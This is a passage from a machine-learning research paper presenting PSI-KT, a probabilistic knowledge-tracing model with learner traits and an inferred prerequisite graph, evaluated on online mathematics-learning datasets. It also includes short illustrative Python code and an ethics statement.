and variance \( w^\ell_n = (\sigma^\ell_n)^2 \bigl(1 - e^{-2\alpha^\ell_n \tau^\ell_n}\bigr) / (2\alpha^\ell_n) \). As the time since the last interaction \( \tau^\ell_n \) grows, the retention ratio \( r^\ell_n \) decreases exponentially with rate \( \alpha^\ell_n \), and the knowledge state reverts to the long-term mean \( \tilde{\mu}^\ell_{n,k} \), which partly depends on the learner’s mastery of prerequisite KCs (Eq. 5). This balances short-term and long-term learning, reflecting empirical findings from memory research (Averell & Heathcote, 2011). The structural influences are accounted for in the dynamics of \( z^\ell_{n,k} \), thus justifying the conditional independence assumed in Eq. 2. A Gaussian initial prior \( p_\theta(z^\ell_{1,k}) = \mathcal{N}(z^\ell_{1,k} \mid \bar{z}, w_1) \), where \( \bar{z}, w_1 \in \mathbb{R} \) are part of the generative parameters \( \theta \), completes our dynamical model of knowledge states.

Learner-specific cognitive traits \( s \). The dynamics of knowledge states (Eqs. 4–6) are parameterized by learner-specific cognitive traits \( (\alpha^\ell_n, \mu^\ell_n, \sigma^\ell_n, \gamma^\ell_n) \), which we collectively denote \( s^\ell_n \). Specifically, \( \alpha^\ell_n \) represents the forgetting rate (Ebbinghaus, 1885; Averell & Heathcote, 2011), \( \mu^\ell_n \) (via \( \tilde{\mu}^\ell_{n,k} \)) captures long-term memory consolidation (Meeter & Murre, 2004) for practiced KCs and expected performance for novel KCs, \( \sigma^\ell_n \) quantifies knowledge volatility, and \( \gamma^\ell_n \) measures transfer ability (Bassett & Mattar, 2017) from knowledge of prerequisite KCs. These traits can develop during learning according to Eq. 1, starting from a Gaussian prior \( p_\theta(s^\ell_1) = \mathcal{N}(s^\ell_1 \mid \bar{s}, R_1) \), where \( \bar{s} \in \mathbb{R}^4 \) and the diagonal matrices \( H, R_1, R \in \mathbb{R}^{4 \times 4} \) are also part of the global parameters \( \theta \).
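As a minimal illustration (variable names ours), one marginalized transition of Eq. 2 can be sampled directly from the OU moments in Eq. 6:

```python
import numpy as np

def ou_transition(z_prev, mu_tilde, alpha, sigma, tau, rng):
    """One marginalized OU step (Eqs. 2 and 6).

    z_prev:   knowledge states at the previous interaction, shape (K,)
    mu_tilde: structure-adjusted long-term means (Eq. 5), shape (K,)
    alpha, sigma: learner's forgetting rate and volatility
    tau:      elapsed time since the previous interaction
    """
    r = np.exp(-alpha * tau)                      # retention ratio (Eq. 6)
    mean = r * z_prev + (1.0 - r) * mu_tilde      # Eq. 6
    var = sigma**2 * (1.0 - np.exp(-2 * alpha * tau)) / (2 * alpha)
    return mean + np.sqrt(var) * rng.standard_normal(z_prev.shape)

rng = np.random.default_rng(0)
z = ou_transition(z_prev=np.zeros(3), mu_tilde=np.ones(3),
                  alpha=0.5, sigma=0.2, tau=2.0, rng=rng)
```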
Shared prerequisite graph \( A \). In our model, prerequisite relations influence knowledge dynamics via the coupling introduced in Eq. 5. We now discuss an appropriate parameterization for the weight matrix of the prerequisite graph, \( A := \{a^{ik}\}_{i,k=1:K} \). We assume that prerequisites are time- and learner-independent so that, in the spirit of collaborative filtering (Breese et al., 2013), we can pool evidence from all learners to estimate them. To prevent a quadratic scaling in the number of KCs, we do not directly model edge weights but derive them from lower-dimensional KC embedding vectors \( u^k \in \mathbb{R}^D \) with \( D \ll K \), collected in the embedding matrix \( U \in \mathbb{R}^{K \times D} \). A basic integrity constraint for a connected pair is that the dependence of KC \( i \) on KC \( k \) should trade off against that of \( k \) on \( i \), i.e., no mutual prerequisites. With this in mind, we exploit the factorization of \( a^{ik} \) introduced by Lippe et al. (2021) into a probability of edge existence \( p(i\text{–}k) \) and a conditional probability of directionality \( p(i \rightarrow k \mid i\text{–}k) \):

\[ a^{ik} := p(i\text{–}k)\, p(i \rightarrow k \mid i\text{–}k) = \text{sigmoid}\bigl((u^i)^\top u^k\bigr)\, \text{sigmoid}\bigl((u^i)^\top (M - M^\top)\, u^k\bigr), \tag{7} \]

where \( i\text{–}k \) denotes the existence of an edge between \( i \) and \( k \), and the skew-symmetric combination \( M - M^\top \) of a learnable matrix \( M \) ensures \( p(i \rightarrow k \mid i\text{–}k) + p(k \rightarrow i \mid i\text{–}k) = 1 \), preventing mutual prerequisites.
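A minimal sketch of this parameterization (names ours), computing the full matrix of edge probabilities from the embeddings:

```python
import numpy as np

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))

def prerequisite_probs(U, M):
    """Edge probabilities a[i, k] = p(edge) * p(i -> k | edge) (Eq. 7).

    U: (K, D) KC embedding matrix; M: (D, D) learnable matrix.
    The skew-symmetric M - M.T makes the directionality factor satisfy
    direction[i, k] + direction[k, i] = 1, ruling out mutual prerequisites.
    """
    existence = sigmoid(U @ U.T)               # symmetric in (i, k)
    direction = sigmoid(U @ (M - M.T) @ U.T)   # antisymmetric logits
    return existence * direction

rng = np.random.default_rng(0)
A = prerequisite_probs(U=rng.normal(size=(5, 3)), M=rng.normal(size=(3, 3)))
print(A[0, 1] / (A[0, 1] + A[1, 0]))  # directional share for the pair (0, 1)
```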
Having presented the generative model, we now turn to inference and prediction.

3.2 Approximate Bayesian Inference and Amortization with a Neural Network

We now describe how we learn the generative model parameters \( \theta \) and how we infer the latent states \( s, z \) introduced in Section 3.1 using a neural network (“inference network”). Since learner-specific latent states \( s \) and \( z \) are deducible solely from limited individual data, we expect non-negligible uncertainty. This motivates our probabilistic treatment of these states using approximate Bayesian inference. By contrast, the model parameters \( \theta \) (KC parameters \( U, M \) in Eq. 7, transition parameters \( \bar{s}, H, R_1, R \) in Eq. 1, and \( \bar{z}, w_1 \) in Eq. 2) can be estimated from all learners, and we thus treat them as point-estimated parameters as described below (detailed derivation in Appendix A.1). Here, without loss of generality, we show the inference for a single learner.

### 3.2.1 Inference on a Fixed Learning History

Here, we assume the full interaction history \( H_{1:N}^\ell \) is available for inferring the posterior over latents \( p_\theta(z_{1:N}^\ell, s_{1:N}^\ell \mid y_{1:N}^\ell) \). We approach the problem using variational inference (VI). In VI, we select a distribution family \( q_\phi \) with free parameters \( \phi \) to approximate the posterior \( p_\theta \) by minimizing their Kullback-Leibler divergence. This can only be done indirectly, by maximizing a lower bound to the marginal probability of the data, the evidence lower bound (ELBO). Here, we adopt the mean-field approximation \( q_\phi(z_{1:N}^\ell, s_{1:N}^\ell \mid y_{1:N}^\ell) = q_\phi(z_{1:N}^\ell)\, q_\phi(s_{1:N}^\ell) \) and jointly optimize the generative \( \theta \) and variational \( \phi \) parameters using variational expectation maximization (EM; Dempster et al., 1977; Beal & Ghahramani, 2003; Attias, 1999). Motivated by real-world scalability, we introduce an inference network (see Appendix A.3 for the architecture) to amortize the learning of variational parameters \( \phi \) across learners, and we employ the reparametrization trick (Kingma & Welling, 2014) to optimize the single-learner ELBO:

\[
\begin{aligned}
\text{ELBO}^\ell(\theta, \phi) = {} & \mathbb{E}_{q_\phi(s_{1:N}^\ell)} \Bigl[ -\log q_\phi(s_{1:N}^\ell) + \log p_\theta(s_1^\ell) + \sum_{n=2}^{N} \log p_\theta(s_n^\ell \mid s_{n-1}^\ell) \Bigr] \\
& + \mathbb{E}_{q_\phi(z_{1:N}^\ell)} \Bigl[ -\log q_\phi(z_{1:N}^\ell) + \log p_\theta(z_1^\ell) + \sum_{n=1}^{N} \log p_\theta(y_n^\ell \mid z_n^\ell, x_n^\ell) \Bigr] \\
& + \mathbb{E}_{q_\phi(z_{1:N}^\ell)\, q_\phi(s_{1:N}^\ell)} \Bigl[ \sum_{n=2}^{N} \log p_\theta(z_n^\ell \mid z_{n-1}^\ell, s_n^\ell) \Bigr].
\end{aligned} \tag{8}
\]

The SSM emissions and transitions were introduced in Eqs. 1–3, along with the respective initial priors. To allow for a diversity of combinations of learner traits to account for the data, we model the variational posterior across learners, \( q_\phi(s_{1:N}) \), as a mixture of Gaussians (see Appendix A.4).

### 3.2.2 Inference in Continual Learning

In real-world educational settings, a KT model must flexibly adapt its current variational parameters \( \phi_n \) with newly available interactions \((x_{n+1}^\ell, t_{n+1}^\ell, y_{n+1}^\ell)\). Retraining on a fixed, augmented history \( H_{n+1}^\ell \) to obtain an updated \( \phi_{n+1} \) is possible (Eq. 8), but expensive. Instead, in PSI-KT, we use the parameters \( \phi_n \) of the current posterior \( q_{\phi_n}(z_n^\ell, s_n^\ell) \) to form a next-time prior,

\[ \tilde{p}(z_{n+1}^\ell, s_{n+1}^\ell) := \mathbb{E}_{q_{\phi_n}(z_n^\ell, s_n^\ell \mid y_{1:n}^\ell)} \bigl[ p_\theta(s_{n+1}^\ell \mid s_n^\ell)\, p_\theta(z_{n+1}^\ell \mid s_{n+1}^\ell, z_n^\ell) \bigr]. \tag{9} \]

Due to the Bayesian nature of our model, we can now update this prior with the new evidence \( y_{n+1}^\ell \) at time \( t_{n+1}^\ell \) using variational continual learning (VCL; Nguyen et al., 2017; Loo et al., 2020), i.e., by maximizing the ELBO:

\[
\begin{aligned}
\text{ELBO}^\ell_{\text{VCL}}(\theta, \phi_{n+1}) = {} & \mathbb{E}_{q_{\phi_{n+1}}(s_{n+1}^\ell)} \bigl[ -\log q_{\phi_{n+1}}(s_{n+1}^\ell) \bigr] \\
& + \mathbb{E}_{q_{\phi_{n+1}}(z_{n+1}^\ell)} \bigl[ -\log q_{\phi_{n+1}}(z_{n+1}^\ell) + \log p_\theta(y_{n+1}^\ell \mid z_{n+1}^\ell, x_{n+1}^\ell) \bigr] \\
& + \mathbb{E}_{q_{\phi_{n+1}}(z_{n+1}^\ell, s_{n+1}^\ell)} \bigl[ \log \tilde{p}(z_{n+1}^\ell, s_{n+1}^\ell) \bigr].
\end{aligned} \tag{10}
\]

Maximizing this \( \text{ELBO}^\ell_{\text{VCL}} \) allows us to update the parameters \( \phi_{n+1} \) based on a new interaction \((x_{n+1}^\ell, t_{n+1}^\ell, y_{n+1}^\ell)\) directly from the previous parameters \( \phi_n \), i.e., without retraining.

### 3.3 Predictions

To predict a learner’s performance on KC \( x_{n+1}^\ell \) at \( t_{n+1}^\ell \), we take the current variational distributions over \( s_n^\ell \) and \( z_n^\ell \) and transport them forward by analytically convolving them with the respective transition kernels (Eqs. 1 and 2). We then draw \( z_{n+1}^\ell \) from the resulting distribution, and predict the outcome \( y_{n+1}^\ell \) by Eq. 3. When predicting multiple steps ahead, we repeat this procedure without conditioning on any of the previously predicted \( y_{n+m}^\ell \).
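The following sketch illustrates this prediction scheme under a simplifying assumption: we hold the traits fixed at their posterior mean rather than convolving with the \( s \)-transition of Eq. 1, and propagate only the Gaussian moments of \( z \) through the OU kernel before Monte-Carlo averaging the Bernoulli emission (names ours):

```python
import numpy as np

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))

def predict_steps(z_mean, z_var, mu_tilde, alpha, sigma, taus, n_samples=1000):
    """Multi-step performance prediction (Sec. 3.3), simplified sketch.

    Propagates the Gaussian over z through the OU transition (Eq. 6)
    for each future interval in `taus`, then Monte-Carlo averages the
    Bernoulli emission (Eq. 3). Traits are held fixed for simplicity.
    """
    rng = np.random.default_rng(0)
    preds = []
    for tau in taus:
        r = np.exp(-alpha * tau)
        # Analytic convolution of N(z_mean, z_var) with the OU kernel
        z_mean = r * z_mean + (1 - r) * mu_tilde
        z_var = r**2 * z_var + sigma**2 * (1 - np.exp(-2 * alpha * tau)) / (2 * alpha)
        z_samples = rng.normal(z_mean, np.sqrt(z_var), size=n_samples)
        preds.append(sigmoid(z_samples).mean())   # P(y = 1)
    return preds

print(predict_steps(z_mean=0.5, z_var=0.1, mu_tilde=0.0,
                    alpha=0.3, sigma=0.2, taus=[1.0, 2.0, 5.0]))
```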
### 4 Evaluations

We argue above that KT for personalized education must predict accurately, scale well with new data, and provide interpretable representations. We now empirically assess these desiderata, comparing PSI-KT with up to 8 baseline models across three datasets from online education platforms. Concretely, we evaluate (i) prediction accuracy, quantifying both within-learner prediction and between-learner generalization (Sec. 4.1), (ii) scalability in a continual learning setting (Sec. 4.2), and (iii) interpretability of learner representations and prerequisite relations (Sec. 4.3).

| Dataset → | Assist12 | Assist17 | Junyi15 |
|-----------|----------|----------|---------|
| # Learners \( L \) | 46,674 | 1,709 | 247,606 |
| # KCs \( K \) | 263 | 102 | 722 |
| # Interactions / 10^6 | 3.5 | 0.9 | 26 |

Table 1: Dataset characteristics.

Datasets. Assistments and Junyi Academy are non-profit online learning platforms for pre-college mathematics. We use Assistments’ 2012 and 2017 datasets\(^2\) (Assist12 and Assist17) and Junyi’s 2015 dataset\(^3\) (Junyi15; Chang et al., 2015), which, in addition to interaction data, provides human-annotated KC relations (see Table 1 and Appendix A.3.2 for details).

Baselines. We select HLR from Duolingo and PPE as two influential psychologically-informed regression models. From the models that use learnable representations, we include two established deep learning benchmarks, DKT and DKTF, which capture complex dynamics via LSTM networks, as well as the interpretability-oriented QIKT.

4.1 Prediction and Generalization Performance

In our evaluations, we mainly focus on prediction and generalization when training on 10 interactions from up to 1000 learners. Good KT performance with little data is key in practical ITS to minimize the number of learners on an experimental treatment (principle of equipoise, similar to medical research; Burkholder, 2021), to mitigate the cold-start problem, and to extend the usefulness of the model to classroom-size groups. To provide ITS with a basis for adaptive guidance and long-term learner assessment, we always predict the 10 next interactions. Figure 2 shows that PSI-KT’s within-learner prediction performance is robustly above baselines for all but the largest cohorts (>60k learners, Junyi15), where all deep learning models perform similarly. The advantage of PSI-KT comes from its combined modeling of KC prerequisite relations and individual learner traits that evolve in time (see Appendix Fig. 13 for ablations). The between-learner generalization accuracy of the models above, when tested on 100 out-of-sample learners, is shown in Table 2, where fine-tuning indicates that parameters were updated using (10-point) learning histories from the unseen learners. PSI-KT shows overall superior generalization except on Junyi15 (when fine-tuning).

4.2 Scalability in Continual Learning

In addition to training on fixed historical data, we also conduct experiments to demonstrate PSI-KT’s scalability when iteratively retraining on additional interaction data from each learner. This parallels real-world educational scenarios, where learners are continuously learning (Sec. 3.2.2). Each model is initially trained on 10 interactions from 100 learners. We then incrementally provide one data point from each learner, and evaluate the training costs and prediction accuracy. Figure 3 shows that PSI-KT requires the least retraining time, retains the best prediction accuracy, and thus achieves the most favorable cost-accuracy trade-off (details in Appendix A.5.3).
4.3 Interpretability of Representations

We now evaluate the interpretability of both learner-specific cognitive traits \(s^\ell\) and the prerequisite graphs \(A\). We first show that our model captures learner-specific and disentangled traits that correlate with behavior patterns. Next, we show that our inferred graphs best align with ground-truth graphs, and that the edge weights predict causal support on downstream KCs.

4.3.1 Learner-Specific Cognitive Traits

For each learner, PSI-KT infers four latent traits, each with a clear dynamical role specified by the OU process (Eqs. 5–6). In contrast, high-performance baselines (AKT, DKT, and DKTF) describe learners via 16-dimensional embeddings solely constrained by network architecture and loss minimization. Another model, QIKT, constructs 3-dimensional embeddings with each element connected to scores of knowledge acquisition, knowledge mastery, and problem-solving. We collectively refer to these learner-specific variables as learner representations. Here, we empirically show that PSI-KT representations provide superior interpretability.

\(^2\) https://sites.google.com/site/assistmentsdata
\(^3\) https://pslcdatashop.web.cmu.edu/DatasetInfo?datasetId=1198

Table 2: Prediction accuracy. FT indicates additional fine-tuning and ↑ indicates larger values are better. The best performance in each row is in bold.

| Dataset | Experiment | HLR | PPE | DKT | DKTF | HKT | AKT | GKT | QIKT | PSI-KT |
|---------|------------|-----|-----|-----|------|-----|-----|-----|------|--------|
| Assist12 | Within ↑ | .54 ± .03 | .65 ± .01 | .65 ± .03 | .60 ± .01 | .55 ± .01 | .67 ± .02 | .63 ± .03 | .63 ± .03 | **.68 ± .02** |
| | Between ↑ | .50 ± .03 | .50 ± .02 | .55 ± .02 | .51 ± .01 | .54 ± .00 | .58 ± .02 | **.61 ± .02** | .60 ± .02 | **.61 ± .03** |
| | w/ FT ↑ | .52 ± .02 | .53 ± .01 | .58 ± .00 | .55 ± .01 | .55 ± .00 | .61 ± .00 | **.62 ± .02** | .60 ± .03 | **.62 ± .02** |
| Assist17 | Within | .45 ± .01 | .53 ± .02 | .57 ± .02 | .53 ± .03 | .52 ± .03 | .56 ± .02 | .56 ± .04 | .58 ± .02 | **.63 ± .02** |
| | Between | .33 ± .03 | .51 ± .02 | .51 ± .00 | .48 ± .00 | .51 ± .02 | .47 ± .01 | **.53 ± .02** | .50 ± .02 | **.53 ± .02** |
| | w/ FT | .41 ± .04 | .51 ± .00 | .51 ± .03 | .53 ± .01 | .51 ± .03 | .51 ± .02 | .54 ± .03 | .51 ± .04 | **.56 ± .02** |
| Junyi15 | Within | .55 ± .02 | .66 ± .03 | .79 ± .03 | .78 ± .01 | .63 ± .02 | .81 ± .02 | .78 ± .02 | .81 ± .02 | **.83 ± .02** |
| | Between | .48 ± .02 | .55 ± .02 | .76 ± .00 | .76 ± .02 | .61 ± .01 | .73 ± .01 | .77 ± .03 | .76 ± .03 | **.79 ± .03** |
| | w/ FT | .52 ± .00 | .65 ± .03 | .81 ± .01 | **.84 ± .01** | .64 ± .03 | .83 ± .00 | .79 ± .03 | .80 ± .03 | .80 ± .02 |

Figure 3: Continual learning. (Top) Cumulative training time. (Bottom) Prediction accuracy on the next 10 time steps. We omit results when time is above, or accuracy is below, the range of the axes.

We ask that learner representations be 1) specific to individual learners, 2) consistent when trained on partial learning histories, 3) disentangled (i.e., component-wise meaningful, as in Bengio et al., 2013), and 4) operationally interpretable, so that they can be used to personalize future curricula. We evaluate desiderata 1–3 with information-theoretic metrics (Table 3; see Appendix A.6 for details), and desideratum 4 with regressions against behavioral outcomes (Table 4).

Specificity, consistency, and disentanglement. Learner representations $s$ should be maximally specific about learner identity $\ell$, which can be quantified by the mutual information $MI(s; \ell) = H(s) - H(s|\ell)$ being high, where $H$ denotes (conditional) entropy.
Additionally, when we infer representations $s_{\ell_{\mathrm{sub}}}$ from different subsets of the interactions of a fixed learner, they should be consistent, i.e., each $s_{\ell_{\mathrm{sub}}}$ should be minimally informative about the chosen subset (averaged across subsets), such that $\mathbb{E}_{\mathrm{sub}}\bigl[MI(s; \mathrm{sub} \mid \ell)\bigr] = H(s|\ell) - \mathbb{E}_{\mathrm{sub}}\bigl[H(s|\ell, \mathrm{sub})\bigr]$ should be low. Note that sequential subsets are unsuitable for this evaluation, since representations evolve in time to track learners’ progression. Instead, we define subsets as groups of KCs whose average presentation time is approximately uniform over the duration of the experiment (see Appendix A.6.1 for details). Lastly, learner representations should be disentangled, such that each dimension is individually informative about learner identity. We measure disentanglement with $MI_{\mathrm{diag}}(s; \ell) := H(s) - H(s|\ell)_{\mathrm{diag}}$, a form of specificity that ignores correlations across dimensions of $s^\ell$ by estimating the conditional entropy only with diagonal covariances.

Table 3: Specificity, consistency, and disentanglement vs. best baseline.

| Metric | Dataset | Baseline | PSI-KT |
|--------------|---------|----------|--------|
| Specificity $MI(s; \ell)$ ↑ | Assist12 | 8.8 | 8.4 |
| | Assist17 | 10.1 | 10.0 |
| | Junyi15 | 13.5 | 14.4 |
| Consistency\(^{-1}\) ↓ | Assist12 | 12.2 | 7.4 |
| | Assist17 | 6.4 | 6.4 |
| | Junyi15 | 7.7 | 5.0 |
| Disentanglement ↑ | Assist12 | 2.3 | 7.4 |
| | Assist17 | 0.6 | 8.4 |
| | Junyi15 | 5.0 | 11.5 |

In empirical evaluations (Table 3), PSI-KT’s representations offer competitive specificity despite being lower-dimensional, and outperform all baselines in consistency and disentanglement. While disentanglement aids interpretability (Freiesleben et al., 2022), it does not itself entail domain-specific meaning for representational dimensions. We now demonstrate that PSI-KT representations correspond to clear behavioral patterns, which is crucial for future applications in educational settings.

Operational interpretability. Having shown that PSI-KT captures specific, consistent, and disentangled learner features, we now investigate whether these features relate to meaningful aspects of future behavior, which would be useful for scheduling operations in ITS. We indeed find that the learner representations of PSI-KT forecast interpretable behavioral outcomes, such as performance decay or initial performance on novel KCs. Concretely, consider the observed one-step performance difference $\Delta y^\ell_n := y^\ell_n - y^\ell_{n-1}$. We expect it to be lower for longer intervals $\tau^\ell_n = t^\ell_n - t^\ell_{n-1}$ due to forgetting. However, we observe no clear trend when plotting $\Delta y^\ell_n$ over $\tau^\ell_n$ for the Junyi15 dataset (Fig. 4, top right). This is explained by different learners forgetting on different time scales. Plotting the same test data instead over scaled intervals $\tau^\ell_n \alpha^\ell_n$ (Fig. 4, top center) shows a clear trend against an exponential fit (solid line) with less variability, demonstrating that $\alpha^\ell_n$ (derived from past data only) adjusts for individual learner characteristics and can be interpreted as a personalized rate of forgetting. Here, the choice of the factor $\alpha^\ell_n$ is motivated by our inductive bias (Eq. 4). The trend is much less clear for all baselines: Fig. 4 (top left) uses the best-fitting component across all learner representations from all baselines (full results in Fig. 8 in Appendix A.6.4).
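A minimal sketch of this diagnostic (names ours), assuming inferred per-interaction forgetting rates are available:

```python
import numpy as np

def forgetting_regression(delta_y, tau, alpha):
    """Regress one-step performance differences on the personalized
    retention factor exp(-alpha * tau) (cf. Table 4).

    delta_y: observed y_n - y_{n-1}, shape (M,)
    tau:     elapsed intervals, shape (M,)
    alpha:   inferred per-interaction forgetting rates, shape (M,)
    Returns slope and intercept of an ordinary least-squares fit.
    """
    retention = np.exp(-alpha * tau)
    X = np.column_stack([retention, np.ones_like(retention)])
    coef, *_ = np.linalg.lstsq(X, delta_y, rcond=None)
    return coef  # [slope, intercept]; a positive slope supports Eq. 4
```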
Analogously, when we consider initial performance on a novel KC, we find for PSI-KT that $\tilde{\mu}^\ell_{n,k}$ (which aggregates mastery of prerequisites for KC $k$ at time $t_n$, see Eq. 5) explains it better than the best baseline (Fig. 4, bottom panels). Table 4 shows that these superior interpretability results are significant and hold across all datasets. In Appendix A.6.4, we discuss two more behavioral signatures (performance variability and prerequisite influence) and show they correspond to the remaining components $\gamma^\ell_n$ and $\sigma^\ell_n$.

### 4.3.2 PREREQUISITE GRAPH

PSI-KT infers a prerequisite graph based on all learners’ data, which helps it to generalize to unseen learners. Beyond helping prediction, reliable prerequisite relations are an essential input for curriculum design, motivating our interest in their interpretability. Figure 5a shows an exemplary inferred subgraph with the prerequisites of a single KC. To quantitatively evaluate the graph, we (i) measure the alignment of the inferred vs. ground-truth graphs and (ii) correlate inferred prerequisite probability with a Bayesian measure of causal support obtained from unseen behavioral data.

#### Alignment with ground-truth graphs.

We analyze the Junyi15 dataset, which uniquely provides human-annotated evaluations of prerequisite and similarity relations between KCs. We discuss here the alignment of prerequisites and leave similarity for Appendix A.7. The Junyi15 dataset provides both an expert-identified prerequisite for each KC and crowd-sourced ratings (6.6 ratings on average on a 1–9 scale). To compare with expert annotations, we compute the rank of each expert-identified prerequisite relation $i \rightarrow k$ in the relevant sorted list of inferred probabilities $\{a^{jk}\}_{j=1}^{K}$ and take the harmonic average (mean reciprocal rank, MRR; Yang et al., 2014). Next, we compute the negative log-likelihood (nLL) of inferred edges $a^{ik}$ using a Gaussian estimate of the (rescaled) crowd-sourced ratings for the $i \rightarrow k$ KC pair. We finally calculate the Jaccard similarity (JS) between the set of inferred edges ($a^{ik} > 0.5$) and those identified by experts, as well as crowd-sourced edges with average ratings above 5. The results in Table 5 (left columns) consistently highlight PSI-KT’s superior performance across all criteria (see Appendix A.7.1 for details).

#### Causal support across consecutive interactions.

For education applications, we are interested in how KC dependencies impact learning effectiveness. If KC $i$ is a prerequisite of KC $k$, mastering KC $i$ contributes to mastering KC $k$, indicating a causal connection. In this analysis, we show that inferred edge probabilities $a^{ik}$ (Eq. 7) correspond to causal support for $i \rightarrow k$ (Eq. 11), derived from behavioral data through Bayesian causal induction (Griffiths & Tenenbaum, 2009). Specifically, we model the relationship between a candidate cause $C$ and effect $E$, i.e., a pair of KCs in our case, while accounting for a constant background cause $B$, representing the learner’s overall ability and the influences of other KCs.

Figure 4: Operational interpretability of representations, Junyi15 dataset. See text for axes labels and Appendix A.6.4 for additional results.
| Behavioural signature | Dataset | Best baseline: coef., $p$ | PSI-KT: coef., $p$ |
|-----------------------|---------|---------------------------|--------------------|
| Performance difference | Assist12 | 0.01, .67 | 0.30, <.001 |
| | Assist17 | −0.03, .30 | 0.56, <.001 |
| | Junyi15 | 0.03, .06 | 0.72, <.001 |
| Initial performance | Assist12 | 0.04, .01 | 0.54, <.001 |
| | Assist17 | 0.05, .01 | 3.70, <.001 |
| | Junyi15 | 0.04, .02 | 0.92, <.001 |

**Table 4:** Coefficients and $p$-values of regressions relating $\exp(-\alpha^\ell_n \tau^\ell_n)$ and $\tilde{\mu}^\ell_{n,k}$ to unseen behavioral data across datasets.

Table 5: (Left) Alignment of inferred graphs with annotated graphs for the Junyi15 dataset. (Right) Regression coefficients and $p$-values relating causal support to inferred edge probabilities. All baseline models either lack significance or negatively predict causal support (Appendix Fig. 12).

| Model | MRR ↑ | JS expert ↑ | JS crowd ↑ | nLL ↓ | coefficient ↑, $p$-value ↓ |
|--------|-------|-------------|------------|-------|--------------------------|
| Best baseline | .0082 | .0015 | .0047 | 3.03 | 1.05, .253 |
| PSI-KT | .0086 | .0019 | .0095 | 4.11 | 1.15, .003 |

Figure 5: Graph interpretability. (a) Subgraph inferred by PSI-KT on the Junyi15 dataset, showing prerequisites of target KC ‘area of parallelograms’. (b) Hypothesized causal graphs, where Graph 1 assumes a causal relationship exists from KC i to KC k, while Graph 0 is the null hypothesis. (c) Regression of edge probabilities against causal supports. Insets show the best baseline model.

We consider two hypothetical causal graphs, where Graph 0 \( G^0_{i \rightarrow k} \) represents the null hypothesis of no causal relationship, and Graph 1 \( G^1_{i \rightarrow k} \) assumes the causal relationship exists, i.e., correct performance on KC $i$ causally supports correct performance on KC $k$ (Fig. 5b). We estimate causal support for each pair of KCs $i \rightarrow k$ based on all consecutive interactions in the behavioral data $H$ from KC $i$ at time $t_n$ to KC $k$ at time $t_{n+1}$, as a function of the difference in log-likelihoods of the two causal graphs (see Appendix A.7.3 for details):

\[ \text{support}_{i \rightarrow k} := \log P(H \mid G^1_{i \rightarrow k}) - \log P(H \mid G^0_{i \rightarrow k}). \tag{11} \]

We then use regression to predict $\text{support}_{i \rightarrow k}$ as a function of the edge probabilities $a^{ik}$ inferred by the different models. The results are visualized in Figure 5c and summarized in Table 5 (right). The larger coefficients indicate that our inferred graphs possess superior operational interpretability (Sec. 4.3).
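Appendix A.7.3 specifies the exact likelihood model behind Eq. 11, which we do not reproduce here; as a hedged illustration, the sketch below substitutes a simple Beta-Bernoulli Bayes factor in the spirit of Griffiths & Tenenbaum (2009), with all counts and priors being assumptions of the sketch:

```python
import numpy as np
from scipy.special import betaln

def log_marginal_bernoulli(successes, failures):
    """Log marginal likelihood of Bernoulli data under a Beta(1,1) prior."""
    return betaln(successes + 1, failures + 1) - betaln(1, 1)

def causal_support(n_after_success, n_after_failure):
    """Simplified sketch of Eq. 11 for one KC pair (i -> k).

    n_after_success / n_after_failure: (correct, incorrect) counts on
    KC k immediately after a correct / incorrect interaction on KC i.
    Graph 0: one shared success rate (background cause only).
    Graph 1: separate rates depending on performance on KC i.
    """
    s1, f1 = n_after_success
    s0, f0 = n_after_failure
    log_p_g0 = log_marginal_bernoulli(s1 + s0, f1 + f0)
    log_p_g1 = (log_marginal_bernoulli(s1, f1)
                + log_marginal_bernoulli(s0, f0))
    return log_p_g1 - log_p_g0

print(causal_support(n_after_success=(18, 2), n_after_failure=(7, 13)))
```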
5 DISCUSSION

We propose PSI-KT as a novel approach to knowledge tracing (KT) with compelling properties for intelligent tutoring systems: superior predictive accuracy, excellent continual-learning scalability, and interpretable representations of learner traits and prerequisite relationships. We further find that PSI-KT has remarkable predictive performance when trained on small cohorts, whereas baselines require training data from at least 60k learners to reach similar performance. An open question for future KT research is how to combine PSI-KT’s unique continual learning and interpretability properties with performance that grows beyond this extreme regime. We use an analytically marginalizable Ornstein-Uhlenbeck process for knowledge states in PSI-KT, resulting in an exponential forgetting law, similar to most recent KT literature. Future work should support ongoing debates in cognition by offering alternative modeling choices for memory decay (e.g., power-law; Wixted & Ebbesen, 1997), thus facilitating empirical studies at scale. While our model already normalizes reciprocal dependencies in the prerequisite graph, we anticipate that enforcing local or global structural constraints, such as acyclicity, may benefit inference and interpretability. Although we designed PSI-KT with general structured domains in mind, our empirical evaluations were limited to mathematics learning by dataset availability. We highlight the need for more diverse datasets for structured KT research to strengthen representativeness in ecologically valid contexts. Overall, our work combines machine learning techniques with insights from cognitive science to derive a predictive and scalable model with psychologically interpretable representations, thus laying the foundations for personalized and adaptive tutoring systems.

ACKNOWLEDGMENTS

The authors thank Nathanael Bosch and Tim Xiao for their helpful discussion, and Seth Axen for code review. The authors thank the International Max Planck Research School for Intelligent Systems (IMPRS-IS) for supporting Hanqi Zhou. This research was supported as part of the LEAD Graduate School & Research Network, which is funded by the Ministry of Science, Research and the Arts of the state of Baden-Württemberg within the framework of the sustainability funding for the projects of the Excellence Initiative II. Funded by the Deutsche Forschungsgemeinschaft (DFG, German Research Foundation) under Germany’s Excellence Strategy – EXC number 2064/1 – Project number 390727645. CMW is supported by the German Federal Ministry of Education and Research (BMBF): Tübingen AI Center, FKZ: 01IS18039A.

ETHICS STATEMENT

We evaluated our PSI-KT model on three public datasets from human learners, all of which anonymize the data to protect the identities of individual learners. Although PSI-KT aims to improve personalized learning experiences, it infers cognitive traits from behavioral data instead of using learners’ demographic characteristics (e.g., age, gender, and the school names provided in the Assist17 dataset), to avoid reinforcing existing disparities. Evaluations of structured knowledge tracing in our paper are limited by dataset availability to pre-college mathematics. To ensure a broader and more ecologically valid assessment, it is essential to explore diverse datasets across various domains (e.g., biology, chemistry, linguistics) and educational stages (from primary to college level). This will allow for a more comprehensive understanding of the role of structure in learning.

REFERENCES

Terry A Ackerman. Multidimensional item response theory models. Wiley StatsRef: Statistics Reference Online, 2014.

Hagai Attias. A variational Bayesian framework for graphical models. Advances in Neural Information Processing Systems, 12, 1999.

Lee Averell and Andrew Heathcote. The form of the forgetting curve and the fate of memories. Journal of Mathematical Psychology, 55:25–35, 2011.

